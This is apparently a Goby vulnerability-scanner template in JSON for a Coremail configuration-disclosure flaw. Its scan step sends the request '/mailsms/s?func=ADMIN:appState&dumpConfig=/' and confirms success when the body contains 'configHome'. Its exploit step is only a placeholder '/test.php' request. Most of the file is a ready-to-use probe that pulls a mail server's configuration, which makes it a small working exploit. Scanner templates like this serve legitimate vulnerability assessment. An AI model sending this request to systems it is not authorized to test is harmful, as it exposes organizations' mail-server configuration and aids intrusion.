Goby/json/Coremail_Config_Disclosure....

96 lines
3.5 KiB
JSON

{
"Name": "Coremail Config Disclosure",
"Level": "2",
"Tags": [
"infoleak"
],
"GobyQuery": "app=\"Coremail\"",
"Description": "Coremail mail system is a large-scale enterprise mail system independently developed, and it is the first Chinese mail system in China.",
"Product": "Coremail",
"Homepage": "https://www.coremail.cn/",
"Author": "",
"Impact": "There is a configuration information leakage vulnerability in an interface of COREMAIL, including port, configuration information, etc.",
"Recommendation": "",
"References": [
"https://www.secpulse.com/archives/107611.html"
],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/mailsms/s?func=ADMIN:appState&dumpConfig=/",
"follow_redirect": false,
"header": null,
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "configHome",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}